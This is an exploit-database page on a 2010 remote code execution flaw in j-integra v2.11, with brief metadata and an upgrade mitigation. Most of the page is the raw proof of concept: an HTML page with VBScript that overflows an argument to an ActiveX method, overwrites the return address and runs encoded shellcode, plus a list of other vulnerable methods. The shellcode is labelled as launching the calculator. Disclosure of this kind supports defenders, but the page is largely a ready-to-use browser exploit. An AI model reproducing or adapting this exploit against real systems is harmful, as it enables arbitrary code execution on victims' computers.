j-integra v2.11 Remote code execution vulnerability

vendor:

j-integra

by:

bz1p

3.3

CVSS

LOW

Remote code execution

CWE

Product Name: j-integra

Affected Version From: v2.11

Affected Version To: v2.11

Patch Exists: YES

Related CWE: ? (0day)

CPE:

Metasploit:

Other Scripts:

Platforms Tested: XP SP3 IE7

2010

j-integra v2.11 Remote code execution vulnerability

This vulnerability allows for remote code execution in j-integra v2.11. The object classid 'clsid:F21507A7-530F-4A89-8FE4-9D989670FD2C' is not marked safe for scripting, allowing an attacker to execute arbitrary code. The exploit has been tested on XP SP3 IE7. The impact is considered low due to the object not being marked safe for scripting. The vulnerability was silently patched by the developers in version v2.12.

Mitigation:

Upgrade to version v2.12 or later to mitigate this vulnerability.

Source

Exploit-DB raw data:

<html>
<!-- 
j-integra v2.11 Remote code execution vulnerability
Discovered on: Thursday, October 28, 2010, 10:10:12 PM
Download: http://j-integra.intrinsyc.com/
Author: bz1p, bz1p@bshellz.net
impact: LOW, due to the object NOT marked safe for scripting
Tested on: XP SP3 IE7
CVE: ? (0day)

NOTE:
This vuln was silently patched by the developers (v2.12), hence I am providing 
this PoC. They did not change the versions for DCOMConfig.dll, so I can only
conclude that they are sneaky and should be slapped for backdooring 
software and making customers pay mula.
-->

<object classid='clsid:F21507A7-530F-4A89-8FE4-9D989670FD2C' id='target' ></object>
<script language='vbscript'>
esp = String(100, "B")

calc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _
unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _
unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _
unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _
unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _
unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _
unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _
unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _
unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _
unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _
unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _
unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _
unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _
unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _
unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _
unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _
unescape("%50%68")

eip = unescape("%2f%55%02%10") ' CALL EDI
arg1=String(253, "A")
arg1 = arg1 + eip + esp + calc
arg2="defaultV"

target.RemoveLaunchPermission arg1 ,arg2
</script>
</html>

<!--
It has also been reported by Dr_IDE that the following methods 
are also vulnerable to the same exploit:
target.RemoveAccessPermission arg1 ,arg2
target.AddLaunchPermission arg1 ,arg2
target.AddAccessPermission arg1 ,arg2
-->